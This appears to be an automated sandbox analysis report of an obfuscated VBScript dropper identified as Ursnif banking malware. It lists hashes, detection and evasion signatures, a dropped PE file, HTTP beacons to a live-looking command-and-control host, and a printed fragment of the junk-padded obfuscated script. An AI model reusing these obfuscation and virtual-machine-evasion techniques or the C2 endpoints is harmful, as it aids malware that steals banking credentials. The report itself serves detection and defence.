Analysis Report 0oV5opFE4RCv.vbs

Overview

General Information

Sample Name: 0oV5opFE4RCv.vbs
Analysis ID: 283387
MD5: 6398c206cfa397d1cac4a11692cc36a7
SHA1: b048cdeed7996f785709fa17403e3ffc026bd537
SHA256: dc4bf01e50d9506c3db81adb96050831647d50650a5349cefbf9eb651381f5c4

Most interesting Screenshot:

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\duke.dxf Avira: detection malicious, Label: TR/AD.UrsnifDropper.kiiwe
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\duke.dxf Virustotal: Detection: 10% Perma Link
Source: C:\Users\user\AppData\Local\Temp\duke.dxf ReversingLabs: Detection: 16%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: global traffic HTTP traffic detected: GET /api1/_2BEA710c1_2Bh/T2r6BJUJQaWNLC0gufW8M/YXMXh7wy00YQ3XQN/roi2nG7DMn6F_2F/FHcK767s_2F6csKKZK/vNu_2B8Lo/_2BPDHqlOM5jKs6AmQPI/IhEdup0oMjwDY9EhZgF/d6WrafOV7lUIf2xBs5bUae/EokL8M9Sa2_2F/WXjyd_2B/nprRIOoFTuo_2F8yRcgc9mV/Pn1cx92RVq/AOEXsVZ5jdrADthNF/PULhKiT1Fpst/J0Y9Sf_2BhN/PzynmT2w5CX4i_/2FdD0HYdgp_2Fa_0A_0DB/_2BZF563CbVTBSBv/KfVhp_2Fq2J_2Bj/noL7CjwCKkJ_2FirYZ/dQrvsLWIs/s8GVCIbfqnlg3cg/wm HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/7k_2B8mbUiH51kFBwdUVd/Zd7a_2Bd_2Fa8B1t/W2qeoE0fiseq8yM/4C_2BbcVuknr4yOUVH/llcIl59j9/C_2FCa_2FhZE5ibrDyyF/_2F7EJtliCRiiG1RqNa/Dou4T0ee1p0NkVbHpISSil/TEImXGOJwrhwK/kmClxim1/nFu9dL9oMJNFcU97eAXH9fs/kGbVWmL1Yj/6ropP4k67E8w7w9nT/d2F8bA6YDYCf/_2Bm9WMAR4E/vOjGFJ80eaxwHV/9xgVg6G4XF3VoKfnqtTJ_/0A_0DZHP6Gs0hjAA/vRspXcsorp9s73Y/ViZ7TDS2Sy2FkTJXf/mbHT HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x245d4ed2,0x01d686fe</date><accdate>0x245d4ed2,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x245d4ed2,0x01d686fe</date><accdate>0x245d4ed2,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Sep 2020 14:08:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.16.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.16.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.16.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.16.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.16.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.16.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.16.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.16.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Java / VBScript file with very long strings (likely obfuscated code)
Source: 0oV5opFE4RCv.vbs Initial sample: Strings found which are bigger than 50
Source: duke.dxf.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal96.troj.evad.winVBS@7/21@2/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: 0oV5opFE4RCv.vbs Static file information: File size 1089538 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\Street\Sit\Kind\41\Has\4\47\Well\43\how\Color\72\94\Melody.pdb source: wscript.exe, 00000000.00000003.388923615.000001B74881E000.00000004.00000001.sdmp, duke.dxf.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(246200227)) > 0 And levitate720 = 0) Then' point Ridgway candle707 Somers sent refract Pandanus despise peafowl dodge, 7404329 gore Morrill viviparous carport293 apologetic don incubi Disneyland Ethel McNally righteous insatiable continuant highroad Apocrypha convocate substantial detent collision seven model. 1978249 parley764 Ferguson Baptiste afire breadth91 childrearing pity853, philosophy McCormick francium peahen, palsy. callosity every pinafore typic heater twin Gouda172 physician. linemen orchard fauna adopt mustang Newman at sailor555 pneumonia amanuensis demerit Bruce Alexandre brow itch studio insignia edematous ago208 huckleberry prognosticate invest thrust lemma, violate subtrahend exhibit excess. plaguey742 snap Johnny insult communicate actinide trip Slocum whimsy nilpotent Exit FunctionREM bel Rafferty pipetting debris mantel Aitken176 codetermine Tyson Serpens899 build, matchbook720 mastermind. 4929032 cipher, tropospheric survivor oxygenate900. 1509755 Pliocene adenoma steelmake, 8199894 ivy depth821 Africa oligopoly. moribund, 953531 molybdenite929 Africa134 formal macintosh. men195 silt praise insouciant65 husband. 6578432 dextrous929 End Ifblouse198 = ((38 + (798 - (44 + (-41.0)))) - 830.0)ivxHAV = (((7 - 2.0) + (36 + 3530.0)) - 3568.0)If CreateObject("Scripting.FileSystemObject").GetFolder(mulligan).Files.Count < blouse198 ThenREM littermate niggardly mongoose themselves226 zagging gratuitous bluegrass271 citizen fluoresce jocose, 3109838 tree nourish injurious207 frost vast avert873 AZ Masonite Martinson amaranth Selkirk carbide tapir, evaluable cellophane771 allegro pinxter695 quitter Potts flounder provocation539 dun mysterious448 Theodosian, Eloise shade368REM wiremen964 focal cyclopean Copeland shant tofu. Rockwell, benchmark top Wilfred declassify tubule Jordan Alberich prosaic alleviate756 raffia. 302350 conformation Szilard stickleback sarcasm. 9357275 schemata Grimaldi sidle livre tulip Josef tongue sortie withdrew. 1408844 Sigmund loanword Starkey Leonardo158 lepidopterist twinkle agog Pierson cream. 7225090 girlish illegitimacy63 daddy438 neath citywide antarctic, Trevelyan loris, 2767450 inferno inapt shun nitty peltry Kepler rs511, Atalanta combatted passband consulate give leftward Maddox Michelin fracture treble apparition grief liquid septennial536 vinyl gander. stuffy polka aesthete358 aileron Vida courier Fulbright OConnell153 octal inferior End IfSet typeset = CreateObject("WScript.Shell")delectate = typeset.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(delectate).Files.Count < ivxHAV Then' eke adoptive. fashion ado Giuliano position861 Kitakyushu380 diverge attributive barrack416 towel Nebuchadnezzar heard retard bunt. appertain spatlum swain. Lou854 stellar ingot887 permeate potash gauleiter miscegenation, cavort beneath Trobriand tecum feedback Fiji Paleolithic mesquite pentane750 aile365 hailstone A
Source: initial sample Static PE information: section name: .text entropy: 6.83975931018

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\duke.dxf Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\duke.dxf Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\0ov5opfe4rcv.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\duke.dxf Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6224 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: duke.dxf.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY